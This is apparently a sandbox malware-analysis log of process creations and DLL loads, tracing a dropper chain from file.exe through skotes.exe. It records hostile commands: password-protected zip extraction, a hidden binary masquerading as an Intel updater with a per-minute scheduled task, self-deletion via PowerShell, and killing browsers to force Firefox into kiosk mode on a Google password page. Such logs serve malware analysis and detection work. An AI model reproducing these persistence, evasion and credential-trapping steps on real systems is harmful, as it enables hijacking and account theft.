Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe "C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe"
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\attrib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Windows\System32\attrib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe "C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe "C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe "C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe "C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe"
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2220 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc514e8d-a7c2-495c-8b76-03b7388ed23b} 6396 "\\.\pipe\gecko-crash-server-pipe.6396" 1eb25d6a110 socket
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe "C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe "C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe "C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe "C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 65,10 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2220 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc514e8d-a7c2-495c-8b76-03b7388ed23b} 6396 "\\.\pipe\gecko-crash-server-pipe.6396" 1eb25d6a110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\mode.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\mode.com Section loaded: ureg.dll Jump to behavior
Source: C:\Windows\System32\mode.com Section loaded: fsutilext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
